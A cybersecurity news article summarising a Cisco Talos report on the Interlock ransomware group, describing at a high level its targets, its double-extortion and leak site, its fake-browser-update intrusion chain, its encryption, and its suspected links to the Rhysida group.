A new ransomware group called Interlock has been observed by threat analysts conducting targeted attacks across sectors including US healthcare, IT and government and European manufacturing.
According to a report published by Cisco Talos today, Interlock employs both “big-game hunting” and double extortion tactics, where compromised data is stolen and threatened to be released publicly unless a ransom is paid.
This group operates a data leak site known as “Worldwide Secrets Blog” to publish stolen data. It offers victim support through chat options, showcasing a methodical approach to targeting vulnerabilities in organizations’ cybersecurity.
Cisco Talos identified that Interlock’s attack chain generally spans around 17 days, during which they gain unauthorized access and deploy ransomware to encrypt files.
How Interlock Executes its Ransomware Attacks
Initial access often comes through a fake Google Chrome browser updater that installs a remote access tool (RAT) disguised as a legitimate update. This RAT, upon execution, collects detailed system information, establishes a secure connection to a command-and-control (C2) server and transmits encrypted data.
Notably, this RAT also installs a credential-stealing component, allowing Interlock to capture login details for online accounts. Interlock’s arsenal extends beyond simple data collection. The group effectively evades detection by disabling Endpoint Detection and Response (EDR) and clearing event logs.
Lateral movement is achieved via Remote Desktop Protocol (RDP) and other remote access tools, suggesting Interlock has developed tactics for reaching different systems within a network, potentially including Linux hosts.
Read more on ransomware attacks: Ransomware Attack Demands Reach a Staggering $5.2m in 2024
The encryption stage employs both Windows and Linux variants of the Interlock ransomware, and both versions rely on a cryptographic library called LibTomCrypt.
Interlock’s attack routines bypass crucial system folders and specific file extensions to avoid system instability, with Windows systems using Cipher Block Chaining (CBC) encryption. In contrast, Linux systems may utilize CBC or RSA encryption.
The Connection Between Interlock and Rhysida Ransomware Groups
Talos’ analysis also noted a potential connection between Interlock and Rhysida ransomware groups, citing overlapping attack techniques, tools and even code. Both groups, for example, use the AzCopy tool to transfer stolen data to remote storage and deploy ransom notes with similar themes, presenting themselves as “helpful” breach informants rather than overt threats.
This trend toward operational diversification and collaboration across ransomware groups reflects broader patterns in the cyber threat landscape, where threat actors increasingly share resources to advance their capabilities.